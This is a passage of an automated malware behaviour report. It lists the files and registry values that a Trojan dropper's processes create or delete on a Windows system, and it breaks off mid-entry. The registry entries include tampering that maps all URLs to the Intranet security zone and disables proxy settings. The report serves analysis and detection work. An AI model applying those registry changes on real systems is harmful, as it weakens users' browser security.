%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe (20504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_a9[1].exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe (32816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso2.tmp (3526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\310714_is.exe (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe (64683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].php (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\240714_ps[1].exe (33816 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\291014_nj[1].exe (110758 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_mb[1] (2696 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe (64392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (0 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (139 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (127551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (135 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (76650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (60186 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\DataBase (26688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\1[1].zip (229748 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FBFDE863-3C17-4B82-A5D1-9B8ED5BE6B40.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\RegWrite.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\2[1].zip (325830 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\479.json (512 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (79 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (255743 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (208 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\quick_searchff#5.4.10.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_light.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\min.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code2.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code3.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\one.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code5.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\unchecked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\uninstallDlg2.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].finish,9 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\UninstallManager.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bk_shadow.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\close.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code4.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\button1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg1.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\sweetsearch!1.0.0.1031.xpi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\Thumbs.db (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\scrollbar.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checked.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\loading_bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code6.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\VMwareXVirtualXIDEXHardXDrive_00000000000000000001[1].2008&update4=nation,us&update5=language,en (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\checkbox_select.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\conf (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\code\code1.jpg (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\images\bg.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\two.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\MessageBox.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\QQBrowserFrame.dll (0 bytes)
The process CashReminder.exe:1232 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\CashReminder\mfs1A.tmp (408297 bytes)
%WinDir%\Temp\P_RuleList.txt (265 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\stores[1].htm (687 bytes)
%WinDir%\Temp\P_StoreList.txt (687 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[1].txt (265 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_StoreList.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process GOSafer.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Temp\G_CheckUpdate.txt (8 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\rules[2].txt (16 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\update[1].htm (8 bytes)
%WinDir%\Temp\G_RuleList.txt (16 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\G_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\G_RuleList.txt (0 bytes)
The process WNet.exe:2284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\rules[1].txt (94 bytes)
%WinDir%\Temp\P_RuleList.txt (94 bytes)
The Trojan deletes the following file(s):
%WinDir%\Temp\P_RuleList.txt (0 bytes)
The process 310714_is.exe:1880 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\is-5M11A.tmp\310714_is.tmp (57 bytes)
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\awhC.tmp (171 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awhD.tmp (149648 bytes)
Registry activity
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7F 0B 73 68 19 D4 B8 20 54 0C 39 E9 0E 94 8F 7F"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"DisplayName" = "ActSys"
"QuietUninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"UninstallString" = "%Program Files%\ActSys\remove_ActSys.exe /S"
"Publisher" = "NINJASOFT LLC"
[HKLM\SOFTWARE\ActSys]
"Version" = "1.2.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ActSys]
"Comments" = "Browse safe online with our product! It alerts you if a page is harmful for your computer (Build ID: wTPAs0BV5vwXnsqTRKHr9acfe)"
"DisplayVersion" = "1.2.0"
The process net1.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 FC 87 E8 80 A2 55 7D AA 1A 8C 10 15 12 EE C2"
The process net1.exe:2596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 74 19 E5 13 50 24 54 9A 40 6B 6D DC A1 84 7D"
The process net1.exe:2220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 2E BE 5A C2 09 9D 92 F4 C5 CA 9C B2 8E DB 30"
The process net1.exe:2588 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 8C FF 26 57 BD 1B F4 D2 AB BE 49 AB 1F 7F C8"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 42 7D A0 57 47 2B B7 FE 76 DE E4 3A 31 67 CE"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web nodes (names with no dots) that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 310714_is.tmp:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 6A 3E 23 7C F3 73 72 CF 72 AC 59 12 BB 7F 79"
The process q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe:1316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B CC C6 55 8D 18 2D B0 27 A2 5D EC 73 67 A1 01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web nodes (names with no dots) that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ProtectService.exe:3496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 96 CC 61 6D 7A 19 DE 6D 6B E8 FC 68 F4 93 2A"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 07 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process ProtectService.exe:3676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 23 63 9C A3 6A 5E 1F 4E 66 23 2C 78 39 B7 EC"
The process ProtectService.exe:3468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 29 46 DA F9 47 D1 BE D9 26 DF 69 E6 7D 1A 96"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
